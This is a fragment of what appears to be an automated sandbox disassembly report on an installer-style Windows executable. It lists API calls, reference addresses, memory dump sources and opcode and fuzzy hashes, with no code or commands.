                                • Part of subcall function 00405ACA: CharNextA.USER32(?,?,00422138,?,00405B36,00422138,00422138,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0,00000000), ref: 00405AD8
                                • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405ADD
                                • Part of subcall function 00405ACA: CharNextA.USER32(00000000), ref: 00405AF1
                              • lstrlenA.KERNEL32(00422138,00000000,00422138,00422138,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0,00000000), ref: 00405B72
                              • GetFileAttributesA.KERNEL32(00422138,00422138,00422138,00422138,00422138,00422138,00000000,00422138,00422138,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0), ref: 00405B82
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                              • String ID: 8!B
                              • API String ID: 3248276644-3245627493
                              • Opcode ID: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                              • Instruction ID: f7918bca05de5a67ada1f7886cb37670742315f8bcd1f0c25b92126024abb592
                              • Opcode Fuzzy Hash: c6667372e5261f6f491ce2a3369269f5050a05521b0262897edc27dc6412bb0c
                              • Instruction Fuzzy Hash: 5DF0F425205E6516C722323A0C45AAF6964CE92324709423BF891B22C3CA3CB8429DBD
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00405163
                              • CallWindowProcA.USER32(?,?,?,?), ref: 004051B4
                                • Part of subcall function 004041A6: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 004041B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                              • Instruction ID: c2e14b81eed27f6ef80c9e529a4f942fbf68e082709ee8d6c9922b6f58a3139d
                              • Opcode Fuzzy Hash: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                              • Instruction Fuzzy Hash: 7801B131900608AFEF218F41DD80F6B3676EB84750F244137FA00BA1D1C7799D929E6D
                              APIs
                              • GetTickCount.KERNEL32 ref: 00405C75
                              • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405C8F
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CountFileNameTempTick
                              • String ID: nsa
                              • API String ID: 1716503409-2209301699
                              • Opcode ID: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                              • Instruction ID: cf48cc2e124a12ae61d5b18fb9546061e9ffe7603c061e2a5f49afbd00461fe6
                              • Opcode Fuzzy Hash: 2db5ec21233206098d740d0a7eec71b69382ff709a5caa38a177d135453c6e3c
                              • Instruction Fuzzy Hash: F3F082363087047BEB108F55DC04B9B7F99DF91750F14803BFA48EA180D6B499648758
                              APIs
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
                              • CloseHandle.KERNEL32(?), ref: 0040576E
                              Strings
                              • Error launching installer, xrefs: 0040574B
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseCreateHandleProcess
                              • String ID: Error launching installer
                              • API String ID: 3712363035-66219284
                              • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                              • Instruction ID: 69b2a91025ee82e0f17d0b644fa8ba69f8cb79a6280e59e5c1840fb2568b3eab
                              • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                              • Instruction Fuzzy Hash: 00E046F0600209BFEB009F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                              • Instruction ID: 6855221002494b765214394805571b816b3a2b1c2e31bdc36608bad3b484bcdf
                              • Opcode Fuzzy Hash: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                              • Instruction Fuzzy Hash: FEA13271E00229CBDF28CFA8C8446ADBBB1FF44305F15856EE816BB281C7795A96DF44
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                              • Instruction ID: 6c4a77322bd37e7d8c46b95768b691bf5348243e95b36c4706824fec2f4d082d
                              • Opcode Fuzzy Hash: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                              • Instruction Fuzzy Hash: A0911170D00229CBDF28CF98C8587ADBBB1FF44305F15856AE816BB281C7795A96DF84
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                              • Instruction ID: 723f18ff0051ee6ad4f375e9cb18d989a687bb59657bcd06a5bbc8819a965d11
                              • Opcode Fuzzy Hash: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                              • Instruction Fuzzy Hash: F5814371E00229CFDF24CFA8C8847ADBBB1FB44305F25856AD416BB281C7389A96DF44
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.101767241311.00000000390E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 390E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_390e0000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID: D}9$D}9$X|9$X~9
                              • API String ID: 0-2832678555
                              • Opcode ID: 5bdadfa3ecd18ddaecd2feaf975387e7fef1939b72713c3b07fd60c9b3adb254
                              • Instruction ID: c2b1ac62eeaa9f8669211e3b9dd928adfb8aa582ae98e8238c01522f2faf8307
                              • Opcode Fuzzy Hash: 5bdadfa3ecd18ddaecd2feaf975387e7fef1939b72713c3b07fd60c9b3adb254
                              • Instruction Fuzzy Hash: 9171A175E0070A8FEB14DFA5C45069EB7F2BF88350F108AA9D405BB741EB70E986CB80
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                              • Instruction ID: f9a0fdfb68df0875c036107095c0f8e37124572de3281b7b6a4fcb1f7c3ff658
                              • Opcode Fuzzy Hash: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                              • Instruction Fuzzy Hash: DF818771D00229DBDF24CFA8D8447AEBBB0FF44305F11856AE856BB280CB785A96DF44
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                              • Instruction ID: 20aa67b2f9945943e29b5428d9247f38e2249d0fc5fe98f3e4ff2a84f3334865
                              • Opcode Fuzzy Hash: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                              • Instruction Fuzzy Hash: 17712271E00229DBDF24CFA8C8447ADBBB1FF44305F15846AE856BB280C7395996DF54
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                              • Instruction ID: 361238ff60de6b05a878e60f6b30513898442098bea6392746699c597b8ff52c
                              • Opcode Fuzzy Hash: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                              • Instruction Fuzzy Hash: 53713371E00229DBDF28CF98C844BADBBB1FF44305F15846AE816BB280CB795996DF54
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                              • Instruction ID: cefc1bbef9c73defef891fc114d0afe65c0266ceafdcaf147cd695a7a928f12c
                              • Opcode Fuzzy Hash: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                              • Instruction Fuzzy Hash: E1715671E00229DBDF28CF98C8447ADBBB1FF44305F15846AD816BB281CB795996DF44
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
                              • CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
                              • lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                              Memory Dump Source
                              • Source File: 00000009.00000002.101737191202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000009.00000002.101737164208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737223052.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737253740.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000009.00000002.101737286678.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                              • Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
                              • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                              • Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9